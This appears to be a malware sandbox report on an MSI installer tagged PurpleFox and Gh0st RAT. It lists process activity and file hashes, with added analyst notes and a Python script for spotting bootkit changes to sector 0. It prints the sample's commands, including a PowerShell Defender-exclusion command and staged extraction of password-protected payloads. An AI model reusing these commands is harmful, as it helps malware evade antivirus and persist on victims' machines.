N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: 35 (LUID 35 = SeCreateSymbolicLinkPrivilege; name not resolved by the sandbox) N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: 35 (LUID 35 = SeCreateSymbolicLinkPrivilege; name not resolved by the sandbox) N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2180 wrote to memory of 2088 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 2180 wrote to memory of 2088 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 2180 wrote to memory of 2088 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 2180 wrote to memory of 2088 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 2180 wrote to memory of 2088 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 2088 wrote to memory of 2936 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 2936 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 2936 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 1088 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 2088 wrote to memory of 1088 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 2088 wrote to memory of 1088 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 1088 wrote to memory of 844 N/A C:\Windows\System32\cmd.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
PID 1088 wrote to memory of 844 N/A C:\Windows\System32\cmd.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
PID 1088 wrote to memory of 844 N/A C:\Windows\System32\cmd.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
PID 1088 wrote to memory of 844 N/A C:\Windows\System32\cmd.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
PID 1088 wrote to memory of 672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1088 wrote to memory of 672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1088 wrote to memory of 672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1088 wrote to memory of 2144 N/A C:\Windows\System32\cmd.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
PID 1088 wrote to memory of 2144 N/A C:\Windows\System32\cmd.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
PID 1088 wrote to memory of 2144 N/A C:\Windows\System32\cmd.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
PID 1088 wrote to memory of 2144 N/A C:\Windows\System32\cmd.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
PID 2088 wrote to memory of 1608 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe
PID 2088 wrote to memory of 1608 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe
PID 2088 wrote to memory of 1608 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe
PID 2088 wrote to memory of 1608 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe
PID 2088 wrote to memory of 612 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\wpsupdate.exe
PID 2088 wrote to memory of 612 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\wpsupdate.exe
PID 2088 wrote to memory of 612 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\wpsupdate.exe
PID 2088 wrote to memory of 612 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\wpsupdate.exe
PID 2088 wrote to memory of 612 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\wpsupdate.exe
PID 2088 wrote to memory of 612 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\wpsupdate.exe
PID 2088 wrote to memory of 612 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\wpsupdate.exe

Uses Volume Shadow Copy service COM API

ransomware
The VSS activity behind this signature (vssvc.exe starting, DrvInst.exe handling STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19, and the SeBackupPrivilege/SeRestorePrivilege adjustments by vssvc.exe above) is the System Restore point that Windows Installer requests before a per-machine install, so on its own this report does not support the ransomware tag. Weight it only alongside snapshot deletion (vssadmin delete shadows, wmic shadowcopy delete, or DeleteSnapshots calls through the COM API), none of which appears here.

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\wpsupdate.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\DrvInst.exe

DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "0000000000000588" "00000000000005B0"

C:\Windows\system32\MsiExec.exe

C:\Windows\system32\MsiExec.exe -Embedding A5A41B0E270329F1C0B286E9D77DBADF M Global\MSI0000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\TransformOptimisticContributor','C:\Program Files','C:\Program Files'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min "" "C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw" -o"C:\Program Files\TransformOptimisticContributor\" -p"03621GQD}PR[O^Dmi;;h" -y & ping 127.0.0.1 -n 2 & start /min "" "C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL" -x!1_WSEcydALszNI.exe -x!sss -x!1_OzasXnwPtTbfCAAsrowrLIIDEPUHpa.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\TransformOptimisticContributor\" -p"93629#*_tvw?-L5@gQl=" -y

C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe

"C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw" -o"C:\Program Files\TransformOptimisticContributor\" -p"03621GQD}PR[O^Dmi;;h" -y

C:\Windows\system32\PING.EXE

ping 127.0.0.1 -n 2

C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe

"C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL" -x!1_WSEcydALszNI.exe -x!sss -x!1_OzasXnwPtTbfCAAsrowrLIIDEPUHpa.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\TransformOptimisticContributor\" -p"93629#*_tvw?-L5@gQl=" -y

C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe

"C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe" -number 177 -file file3 -mode mode3

C:\Program Files\TransformOptimisticContributor\wpsupdate.exe

"C:\Program Files\TransformOptimisticContributor\wpsupdate.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 im.qq.com udp
US 8.8.8.8:53 updatepro.wps.cn udp

Files

memory/2088-12-0x00000000001E0000-0x00000000001F0000-memory.dmp

memory/2936-17-0x000000001B210000-0x000000001B4F2000-memory.dmp

memory/2936-18-0x0000000002270000-0x0000000002278000-memory.dmp

C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe

MD5 c31c4b04558396c6fabab64dcf366534
SHA1 fa836d92edc577d6a17ded47641ba1938589b09a
SHA256 9d182f421381429fd77598feb609fefb54dcaef722ddbf5aa611b68a706c10d3
SHA512 814dcbc1d43bc037dadc2f3f67856dd790b15fc1b0c50fa74a169c8cc02cdc79d44f1f10e200ef662eee20cd6b5ca646ec4e77673e3fe3cb7dfb7649243f6e99

C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw

MD5 831ff4029b30419da4ac4d32bf8ff05c
SHA1 8c121d0cd017ce5f7ca8cbf6abd8909b2fe445bc
SHA256 ab281716242897be222c1d4cc979fd5de9e7d1cde56e70ac1010e6b3dc76826d
SHA512 17f2efdb891dcf9ceacb8b24801ec59866f969baa55d1c92c15a7150c13f18cc3f481984b5971456e1ad0f204db016698bfe012c086ffa2028582c1d9302a8c5

C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL

MD5 d045828473a8165effd59a97232e6107
SHA1 f86bd9763d6c70ec3ca79134598de4fa44c6bc94
SHA256 9aaae0f7b3bdab287ad703c7eb4baa1a0746b6d353e57ae74d985b10a2102016
SHA512 07e77aa6a433d4541d80276d37e682012509b480a6861f9fbe3cd89929b352d6754cc649526f95c4bd76cf4e1c8bceb275a0217c38193ab88891166934d79659

C:\Program Files\TransformOptimisticContributor\2_WSEcydALszNI.exe

MD5 fb22fb79f366c65257b7adb24c70d843
SHA1 ca6d29a4806d52350e1a50c7b71526dfaab2d525
SHA256 44f2ea5b5dd47fc256a341dee1d2dacfc24adba395a49fd8c4ad3613bfe2d43d
SHA512 c4dfb9273bd937f5480646e12d77073a476719f1f15ee5885e0999f0bbc68f80b1909489f7bd78a3bfb4687a55442f655f4538fda20afe4a7b87623e9bdfe7d9

C:\Program Files\TransformOptimisticContributor\wpsupdate.exe

MD5 57dadd6a929f64c2b1efe2d52c1c4985
SHA1 962cb227f81f885f23826c3e040aa9dbc97659cf
SHA256 996b5d59cce7955b4374bd00d83c422d3a1d9ffebba59c66074c37ab28cfaeb5
SHA512 3f64c35e72698ea6a7e708a4367277f3ab62c27f0652e0c55bab6e02239ee37c4f0a21503c0688301fb77bbf8e59e3c5c8aa2df8d62a4ab8a9b9cdf6f0a775cf

C:\Config.Msi\f779178.rbs

MD5 ea9c96d2913d4fbcefe1cc0e1b580fa9
SHA1 1a38abb197532eac75fc27b259e6831be18205e8
SHA256 2611dd6940254a9db0963e27ef7eec2fdd591cbcf76435898f4d2004b8d21e42
SHA512 f3b44809c4949991187b5972e7f8f53ead852b377c1a3e8e52c5c955b31b12cf9da5302c9af13f932442abe867228916b265ddaef32f58d8f51d6ac89dac3cf6

C:\Windows\Installer\f779176.msi

MD5 ef294458016f546c5eebd07d2dd98bad
SHA1 66bb14f670055272e12899d401b8668cad15fac9
SHA256 c17c018f5df7a413dc053a325b6c291c9cd84f1b9e2415ffe205e02a7e5d6b4a
SHA512 97ee150f49bb587147f30d2215174f5376420abd5d659a2c68d58bc67f823715030cc328eab7e11623f4ee8504f1f080ceb44ac2d6fca7c636ea8d7c936f0333

memory/1608-62-0x0000000001F30000-0x0000000001F5F000-memory.dmp

C:\Users\Admin\AppData\Roaming\kingsoft\office6\log\update\wpsupdate_2024_11_19.log

MD5 389392e8cb2a84e9ae0e9e501d9bc0bb
SHA1 bb76285ed018efe778b9bd1ca7b6e5e95a38a390
SHA256 38cfc855bbf0b5ea523f92b78195f04a043123d9093f176a72f73539f92fbe45
SHA512 9bd81bc468bfaea6b0ae437937cf21c4eeb1136125a3e742a405f4c0e0297ee51c43bcb1fcfb2b5615f5643bd73d2605a0c5d5853c17bd1b324137426f0741ea

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-19 04:50

Reported

2024-11-19 04:53

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

152s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\wpsupdate.msi

Signatures

Detect PurpleFox Rootkit

rootkit
Description Indicator Process Target
N/A N/A N/A N/A

Gh0st RAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Gh0strat

rat gh0strat

Gh0strat family

gh0strat

PurpleFox

rootkit trojan purplefox

Purplefox family

purplefox

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
What the sandbox recorded is a handle to \??\PhysicalDrive0 opened with write access, not a write to sector 0. Hardware-fingerprinting code that queries the disk serial through the physical-drive handle commonly opens it the same way, and wpsupdate.exe goes on to populate Kingsoft khdinfo hardware-ID values under HKEY_USERS (see the table further down), so confirm a real MBR change by comparing sector 0 before and after detonation rather than from this indicator alone.
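The comparison suggested above, as an added example that is not part of the report: it parses a 512-byte MBR (bootstrap code, NT disk signature, four partition entries, 0x55AA boot signature) and hashes the bootstrap area separately from the partition table, so a before/after diff separates a bootstrap implant from a harmless partition edit. The sample sector, its stub code and the "implant" are constructed here and are not bytes from this sample; on a live host the same 512 bytes come from reading \\.\PhysicalDrive0 as Administrator, which is what read_sector0 does.

```python
"""Sector-0 parsing and before/after comparison. Added example, not from the
report; the sample sector and implant below are constructed."""
import hashlib
import struct
from dataclasses import dataclass
from typing import List, Tuple

SECTOR = 512
CODE_END = 440     # bootstrap code occupies bytes 0..439
DISK_SIG = 440     # 4-byte NT disk signature
PT_OFFSET = 446    # four 16-byte partition entries
BOOT_SIG = 510     # 0x55 0xAA

@dataclass(frozen=True)
class Partition:
    index: int
    bootable: bool
    type_id: int
    lba_start: int
    sectors: int

@dataclass(frozen=True)
class Mbr:
    code_sha256: str
    disk_signature: int
    partitions: Tuple[Partition, ...]
    valid_boot_sig: bool

def parse_mbr(sector: bytes) -> Mbr:
    if len(sector) != SECTOR:
        raise ValueError("an MBR is exactly 512 bytes")
    parts = []
    for i in range(4):
        # status, CHS start (3 bytes, skipped), type, CHS end (skipped), LBA start, sector count
        status, ptype, lba, count = struct.unpack_from("<B3xB3xII", sector, PT_OFFSET + 16 * i)
        if ptype:
            parts.append(Partition(i, status == 0x80, ptype, lba, count))
    return Mbr(
        code_sha256=hashlib.sha256(sector[:CODE_END]).hexdigest(),
        disk_signature=struct.unpack_from("<I", sector, DISK_SIG)[0],
        partitions=tuple(parts),
        valid_boot_sig=sector[BOOT_SIG:BOOT_SIG + 2] == b"\x55\xaa",
    )

def diff_mbr(before: bytes, after: bytes) -> List[str]:
    """What changed between two sector-0 snapshots, most serious first."""
    a, b = parse_mbr(before), parse_mbr(after)
    findings = []
    if a.code_sha256 != b.code_sha256:
        findings.append("bootstrap code changed")
    if not b.valid_boot_sig:
        findings.append("boot signature 0x55AA missing")
    if a.disk_signature != b.disk_signature:
        findings.append("disk signature changed")
    if a.partitions != b.partitions:
        findings.append("partition table changed")
    return findings

def read_sector0(device: str = r"\\.\PhysicalDrive0") -> bytes:
    """Live read on Windows (elevated): the same device the sandbox saw being opened."""
    with open(device, "rb") as f:
        return f.read(SECTOR)

# Constructed stub: the first 11 bytes resemble the standard Windows MBR prologue
# (xor ax,ax / mov ss,ax / mov sp,7C00h / mov es,ax / mov ds,ax), the rest is NOP padding.
STUB = b"\x33\xc0\x8e\xd0\xbc\x00\x7c\x8e\xc0\x8e\xd8" + b"\x90" * (CODE_END - 11)

def build_sample(code: bytes = STUB, disk_sig: int = 0x1234ABCD) -> bytes:
    """Constructed sector: given stub, one bootable NTFS (0x07) partition at LBA 2048."""
    sector = bytearray(SECTOR)
    sector[:len(code)] = code
    struct.pack_into("<I", sector, DISK_SIG, disk_sig)
    struct.pack_into("<B3xB3xII", sector, PT_OFFSET, 0x80, 0x07, 2048, 204800)
    sector[BOOT_SIG:] = b"\x55\xaa"
    return bytes(sector)

def implant(sector: bytes) -> bytes:
    """Constructed bootkit-style edit: replace the stub's entry with a far jump (EA off16 seg16)."""
    patched = bytearray(sector)
    patched[0:5] = b"\xea\x00\x7c\x00\x00"
    return bytes(patched)
```

Hash the bootstrap area against a known-good MBR for the disk's boot loader rather than against the whole sector, because disk-signature and partition-table changes are routine (VSS and disk management touch them) while the bootstrap code of a Windows system disk should never change outside a boot-loader update.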

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\nKecPJAaIeFB.exe.log C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe N/A
The .NET runtime writes CLR_v4.0\UsageLogs\<exe>.log under the profile of the account running a managed process, so nKecPJAaIeFB.exe is a .NET executable and it ran under the SYSTEM profile (systemprofile). Together with the nKecPJAaIeFB.xml and nKecPJAaIeFB.wrapper.log files in the next table, the <name>.exe / <name>.xml / <name>.wrapper.log layout matches the WinSW service wrapper, which would install the dropped payload as a Windows service; this is an inference from the file names, since the report does not record the service creation itself.

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\TransformOptimisticContributor\WSEcydALszNI C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File created C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe C:\Windows\System32\MsiExec.exe N/A
File created C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File created C:\Program Files\TransformOptimisticContributor\pvugBgEMyjnfIRZnnRolAMMekSRFAr C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor\pvugBgEMyjnfIRZnnRolAMMekSRFAr C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
